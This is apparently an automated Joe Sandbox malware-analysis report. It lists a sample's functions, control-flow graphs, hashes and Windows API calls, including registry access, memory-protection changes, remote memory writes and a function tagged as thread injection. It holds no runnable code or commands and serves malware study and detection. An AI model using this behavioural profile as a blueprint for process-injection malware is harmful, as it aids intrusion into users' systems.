                                                          control_flow_graph 248 521930-521982 250 521988-52198b 248->250 251 521b19 248->251 253 52198d-521993 250->253 252 521b1e-521b34 251->252 254 5219e0-5219e2 253->254 255 521995-521998 253->255 256 5219e4-5219e9 254->256 257 5219eb-5219ee 254->257 258 5219c6-5219c8 255->258 259 52199a-52199d 255->259 256->257 263 521b00 257->263 264 5219f4-521a16 257->264 261 5219d3-5219d4 258->261 262 5219ca-5219d1 258->262 259->258 260 52199f-5219a1 259->260 265 5219c2-5219c4 260->265 266 5219a3-5219a6 260->266 268 5219d7-5219de 261->268 262->261 267 521b05-521b17 RtlDeleteBoundaryDescriptor 263->267 271 521af9-521afe 264->271 272 521a1c-521a29 264->272 265->268 266->257 269 5219a8-5219b3 266->269 267->252 268->253 268->254 273 5219b5 269->273 274 5219b8-5219bf 269->274 271->267 275 521a2f-521a35 272->275 276 521aec-521af7 272->276 273->274 274->265 277 521a37-521a8b 275->277 276->267 280 521ac3-521ae1 277->280 281 521a8d-521a8e 277->281 280->277 286 521ae7-521ae8 280->286 282 521a90-521a9f lstrcmp 281->282 283 521aa1-521ab8 282->283 284 521abc 282->284 283->282 287 521aba 283->287 288 521abe-521abf 284->288 286->276 287->288 288->280
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptorlstrcmp
                                                          • String ID:
                                                          • API String ID: 735288309-3916222277
                                                          • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction ID: 171dd6bfbd0e794247021d245188578935e91e7f6b6a1ede13365b95c119e5ff
                                                          • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction Fuzzy Hash: 9F517F31618E684FD72CAE1CEC8617A77D5FBAA351F14013ED9DAC3291DA209C5387C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0053D43C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 289 53d43c-53d483 call 547004 292 53d522-53d529 289->292 293 53d489-53d4ba RegQueryValueExA 289->293 294 53d52b-53d533 292->294 295 53d55d-53d565 292->295 296 53d4c3-53d4cc call 54772c 293->296 297 53d4bc-53d4c1 293->297 298 53d553 294->298 299 53d535-53d551 call 539684 294->299 300 53d567-53d580 295->300 301 53d5d5-53d5e4 295->301 302 53d4d1-53d4e0 296->302 297->296 297->302 298->295 299->295 299->298 309 53d582-53d5c4 300->309 310 53d5ce-53d5cf 300->310 305 53d4e2-53d515 302->305 306 53d517-53d518 302->306 305->306 306->292 309->310 310->301
                                                          APIs
                                                            • Part of subcall function 00547004: RegCreateKeyA.ADVAPI32(?,?,?,00549153), ref: 00547027
                                                          • RegQueryValueExA.KERNELBASE ref: 0053D4B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID: ($(
                                                          • API String ID: 2711935003-222463766
                                                          • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction ID: d6232132b9f0b11a8d03a5c054298d08c5bbf1c296ab1a760558d3dad8544fd7
                                                          • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction Fuzzy Hash: 1541B3706197488FE748EF18E8886A677F5FB98309F00C52DE48AC3260DF78DA45CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052B7C0 Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 312 52b7c0-52b811 RegQueryValueExA 313 52b813-52b817 312->313 314 52b819-52b831 RtlAllocateHeap 312->314 315 52b84d-52b869 313->315 316 52b833 314->316 317 52b86a-52b891 RegQueryValueExA 314->317 318 52b836-52b839 316->318 317->318 319 52b893-52b89d 317->319 318->315 320 52b83b-52b845 318->320 319->315 320->315
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 0052B803
                                                          • RtlAllocateHeap.NTDLL ref: 0052B825
                                                          • RegQueryValueExA.KERNELBASE ref: 0052B887
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2311914766-0
                                                          • Opcode ID: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                                                          • Instruction ID: 53e9c6899b65609232a6ef3b72d804d2fc2e43463788d23449e558c0abf98f0a
                                                          • Opcode Fuzzy Hash: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                                                          • Instruction Fuzzy Hash: 9031843161CB088FEB58EF18E489666B7E1FBA8311F11456EE84DC3251EF74DC458B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0054E2C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 545 54e2c4-54e341 546 54e343-54e363 545->546 547 54e368-54e394 545->547 552 54e59a-54e5b1 546->552 548 54e396-54e3a8 547->548 549 54e3aa-54e3ae 547->549 551 54e3b2-54e3be 548->551 549->551 553 54e3c0-54e3cf 551->553 554 54e3dc-54e3df 551->554 566 54e3d5-54e3d6 553->566 567 54e570-54e57a 553->567 555 54e3e5-54e3e8 554->555 556 54e4b3-54e4bb 554->556 560 54e3fc-54e40d LoadLibraryA 555->560 561 54e3ea-54e3fa 555->561 557 54e4cc-54e4cf 556->557 558 54e4bd-54e4ca 556->558 564 54e4d5-54e4d8 557->564 565 54e56c-54e56d 557->565 558->557 562 54e467-54e471 560->562 563 54e40f-54e423 560->563 561->560 561->562 572 54e4a3-54e4a4 562->572 573 54e473-54e477 562->573 581 54e425-54e435 563->581 582 54e437-54e462 563->582 570 54e503-54e517 564->570 571 54e4da-54e4dd 564->571 565->567 566->554 574 54e597-54e598 567->574 575 54e57c-54e591 567->575 570->565 585 54e519-54e52d 570->585 571->570 577 54e4df-54e4ea 571->577 578 54e4ac-54e4ad 572->578 573->578 579 54e479-54e48a 573->579 574->552 575->574 577->570 583 54e4ec-54e4f1 577->583 578->556 579->578 587 54e48c-54e4a1 579->587 581->562 581->582 582->552 583->570 586 54e4f3-54e4f8 583->586 592 54e53c-54e53f 585->592 593 54e52f-54e53a 585->593 586->570 590 54e4fa-54e501 586->590 587->578 590->565 590->570 592->565 594 54e541-54e568 592->594 593->592 594->565
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction ID: 01a36f56ed18a47cd6d360573e2ec16822810b1745493efd465dcec427d63417
                                                          • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction Fuzzy Hash: C7A17030508F0A8FEB55DF68D8896BA77E1FB98319F00462ED84AC7261EF34D941CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00521B38 Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 682 521b38-521b80 call 54887c 685 521b86-521b9f call 547340 682->685 686 521d09-521d0e 682->686 691 521ba5-521bd6 call 530af0 685->691 692 521cff-521d07 685->692 688 521d12-521d32 686->688 691->688 696 521bdc-521be4 691->696 692->688 697 521be6-521beb 696->697 698 521c5f-521c8e VirtualProtect 696->698 697->698 699 521bed-521bff call 52634c 697->699 700 521c90-521c98 call 52fd58 698->700 701 521c9d-521cf5 call 54a148 698->701 699->698 706 521c01-521c19 call 547340 699->706 700->701 701->688 713 521cf7-521cfd 701->713 706->698 712 521c1b-521c59 VirtualProtect 706->712 712->698 713->688
                                                          APIs
                                                            • Part of subcall function 00547340: VirtualProtect.KERNELBASE ref: 00547373
                                                          • VirtualProtect.KERNELBASE ref: 00521C59
                                                          • VirtualProtect.KERNELBASE ref: 00521C7C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction ID: af311458fec81b173aade4e185d3f632f3f13a679886c918e6cce97694e981c6
                                                          • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction Fuzzy Hash: E7516070618F098FD744EF29E889766B7E1FBAC305F10056EE44AC3261DB34E941CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052BC00 Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrRChrA.KERNELBASE ref: 0052BC73
                                                          • RtlAddVectoredContinueHandler.NTDLL ref: 0052BD67
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction ID: eebf24fa259df6c61f364edf04600cfb3635d17684d13f56e5b336a109d07c4c
                                                          • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction Fuzzy Hash: 7B41C730618A158FFB65EF34E8887AA7BE1FF99301B65452DD446C32A1DF78C942CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00538A08 Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00538F1E,?,?,?,?,?,?,0000007E,0052F548), ref: 00538A6C
                                                          • RegCloseKey.KERNELBASE ref: 00538AEF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID:
                                                          • API String ID: 47109696-0
                                                          • Opcode ID: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                                                          • Instruction ID: 2df515a5355e79089dfcdfc1470391868477f74ec5a5d33d5ab0f87f5c801422
                                                          • Opcode Fuzzy Hash: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                                                          • Instruction Fuzzy Hash: 47312131618B4C8FD798EF68D894A6A77E1FBA8310F054A7EE44EC3251DB34D945CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00548678 Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00531105), ref: 005486B6
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00531105), ref: 00548723
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction ID: f8e5847d4e0c3f61703ad57cdac519ffff0e2a70d6b5aa060903fcaddb101946
                                                          • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction Fuzzy Hash: B5216230618B088FD758EF28E859676B7E1FB98355F20446EE44AC3661DF35ED41CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00547004 Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(?,?,?,00549153), ref: 00547027
                                                          • RegOpenKeyA.ADVAPI32(?,?,?,00549153), ref: 00547034
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction ID: 066082ed56d6a87cccb6ae3eda33bc183bdeb438444d5de8fd8a8cf57f62fae0
                                                          • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction Fuzzy Hash: 2E016130618A184FDB44DB5C9488769BBE1FBEC355F10446DE98EC3261DAB4C9458B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005426BC Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction ID: 07bf1848420fcf1ea831edc8c24ca32d16fa67bb6b774502fc3f6088a1aef9d8
                                                          • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction Fuzzy Hash: 0B015E30754E098FEB94EFADA85D729BBE2EBA8311B04416AE409C3274DF78DC41C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00544EB8 Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction ID: 2f3b5bb1f0ed6c80a9401ac5b0f1623ff075afa2a69c2af8aa5ba91379d051e2
                                                          • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction Fuzzy Hash: 52616470618E099FD758EF18D489AA6B7E0FB68315F50456EE84EC3261EB34E841CBC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0053B4B0 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 0053B5F6
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction ID: ba9fc69923634a32a861146a45f7afdc6f673894456b3a0c2a1f37fd5915354d
                                                          • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction Fuzzy Hash: 8341F530658A1C8FEB54EF6CEC859A57BE1F799310B51451DE00AC7262EB78EC85CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00539D2C Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 717fc8819063fd2f3358b63fb39f44d66ac571a1cb919be2f6f1de28bb596156
                                                          • Instruction ID: ebed7ff898d1502001c37023238ac1c431438144bfa56d9ed1aade3f192e2de3
                                                          • Opcode Fuzzy Hash: 717fc8819063fd2f3358b63fb39f44d66ac571a1cb919be2f6f1de28bb596156
                                                          • Instruction Fuzzy Hash: 9D314F7060CB498FDB54EF1C9889A65B7E1FB98311F40466EE84DC3366DA70EC45C786
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0053F31C Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                                                          • Instruction ID: dd18939c17ce661ee4213d2074f6afe34c6e13b58aa72c86aa4f0ba77805397f
                                                          • Opcode Fuzzy Hash: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                                                          • Instruction Fuzzy Hash: 9C316F307146098BAB48EF78ECD99AA77E2FBD8300B54D529A547C3291DF38D9428B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00548FA0 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 00549042
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: 25955b6b7d28094b430422e93eae0a524a3ca9d0a0a5b5ac335d12c466232b15
                                                          • Instruction ID: 7bb98f0e2267dfde3f8a7e2a13d5d65f4f500eebe3b77850ebf3fe3356f9b5b6
                                                          • Opcode Fuzzy Hash: 25955b6b7d28094b430422e93eae0a524a3ca9d0a0a5b5ac335d12c466232b15
                                                          • Instruction Fuzzy Hash: B5218631718A4C8FE798EF68E88E66A77D1F799310F10456DE54FC3252DE28EC468781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052495C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE ref: 00524A08
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction ID: 55bf2683286b30389cee8f5c52c295e281500c30d315125745737d198c90b7cd
                                                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction Fuzzy Hash: 0A215931218B598FEB95EF28D888A6A7BE5FBA8301B11152EE50AC3260DB34D9448B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00547340 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction ID: 803befb77053983d9a227e58e16aa3ca2a31e2896fd05ea2e5188b8c4f02e254
                                                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction Fuzzy Hash: 0811513160CB0D8FAB14EF59E445469B7E5F79C311B104A3EEC8BC3245EE70E9058B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00524A48 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00526D24: NtWriteVirtualMemory.NTDLL ref: 00526D43
                                                          • VirtualProtectEx.KERNELBASE ref: 00524A9C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: Virtual$MemoryProtectWrite
                                                          • String ID:
                                                          • API String ID: 1789425917-0
                                                          • Opcode ID: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                                                          • Instruction ID: 2123101c8b36935f2a2ffcc6759df390a776356aa3370e6378ded8c4342cac89
                                                          • Opcode Fuzzy Hash: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                                                          • Instruction Fuzzy Hash: F6011A70A18B088FCB48EF59E0C9525B7E0FB98311B50456EE94DC7296DB70D945CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00000157239365E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction ID: 867f810a698fdd7f98b7471aea1812263cb63a690b98898c6640fc8240f34267
                                                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction Fuzzy Hash: CD415A71208B488FD764EF29D8C9B9AB7E5FBD9301F50492EE48EC7250DB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572393EEF8 Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 80 1572393eef8-1572393ef77 83 1572393efad-1572393efae 80->83 84 1572393ef79-1572393efab call 1572393e53c 80->84 85 1572393efb0-1572393efb3 83->85 84->85 88 1572393efb9-1572393efe2 CreateMutexExA 85->88 89 1572393fb22-1572393fb3e 85->89 92 1572393efe4-1572393efe9 88->92 93 1572393f000-1572393f003 88->93 94 1572393efeb-1572393eff8 92->94 95 1572393effd-1572393effe 92->95 96 1572393f009-1572393f030 93->96 97 1572393fb1f-1572393fb20 93->97 94->97 95->93 100 1572393f0f7-1572393f0f8 96->100 101 1572393f036-1572393f082 96->101 97->89 102 1572393f0fa-1572393f0fd 100->102 115 1572393f099-1572393f0a9 101->115 116 1572393f084-1572393f08b 101->116 102->89 103 1572393f103-1572393f144 102->103 107 1572393f1e8-1572393f1e9 103->107 108 1572393f14a-1572393f150 103->108 112 1572393f1eb-1572393f1ee 107->112 109 1572393f1be-1572393f1e6 call 15723943bc8 108->109 110 1572393f152-1572393f160 108->110 109->112 114 1572393f162-1572393f1aa 110->114 112->89 113 1572393f1f4-1572393f20f GetUserNameA 112->113 118 1572393f240-1572393f252 113->118 119 1572393f211-1572393f22d 113->119 120 1572393f1ac-1572393f1b0 114->120 121 1572393f1b6-1572393f1bc 114->121 123 1572393f0af-1572393f0d8 115->123 116->115 122 1572393f08d-1572393f093 call 1572395b2cc 116->122 125 1572393f25b-1572393f2a4 118->125 126 1572393f254-1572393f259 118->126 119->118 133 1572393f22f-1572393f238 119->133 120->121 121->109 121->114 122->115 132 1572393f0da-1572393f0f5 123->132 143 1572393f2b7-1572393f2b8 125->143 144 1572393f2a6-1572393f2af 125->144 126->125 129 1572393f2c6-1572393f2cb 126->129 134 1572393f30d-1572393f310 129->134 135 1572393f2cd-1572393f2ee 129->135 132->102 133->118 137 1572393f327-1572393f35e 134->137 138 1572393f312-1572393f322 call 1572393b7b8 134->138 149 1572393f2f0-1572393f2f7 135->149 150 1572393f302-1572393f30a 135->150 145 1572393f360-1572393f380 137->145 146 1572393f3c1 137->146 138->137 148 1572393f2c0 143->148 153 1572393f3e4-1572393f3f0 144->153 154 1572393f2b5 144->154 162 1572393f386-1572393f3a4 call 1572393ccc8 145->162 151 1572393f3c6-1572393f3c9 146->151 148->129 149->150 156 1572393f2f9-1572393f300 149->156 150->134 151->89 157 1572393f3cf-1572393f3d2 151->157 160 1572393f46a-1572393f47c call 15723959604 153->160 161 1572393f3f2-1572393f423 call 1572395ba3c 153->161 154->148 156->134 158 1572393f3db-1572393f3de 157->158 159 1572393f3d4 call 1572394b4b0 157->159 158->89 158->153 168 1572393f3d9 159->168 171 1572393f47e-1572393f4af call 1572395ba3c 160->171 172 1572393f4b6-1572393f4c8 call 157239598a8 160->172 161->160 173 1572393f425-1572393f42d 161->173 174 1572393f3b3 162->174 175 1572393f3a6-1572393f3af 162->175 168->158 183 1572393f4d0 call 1572394d43c 171->183 184 1572393f4b1-1572393f4b2 171->184 172->183 173->160 178 1572393f42f-1572393f464 call 1572394ef6c 173->178 180 1572393f3b8-1572393f3bf 174->180 175->162 179 1572393f3b1 175->179 178->160 179->180 180->151 188 1572393f4d5-1572393f517 call 1572394ac88 183->188 184->172 192 1572393f519-1572393f538 188->192 193 1572393f540-1572393f54d call 1572395b4d0 188->193 192->193 193->89 197 1572393f553-1572393f56c 193->197 197->89 199 1572393f572-1572393f59a 197->199 201 1572393f59c-1572393f5b1 199->201 202 1572393f5c0-1572393f5ea call 157239526bc 199->202 201->202 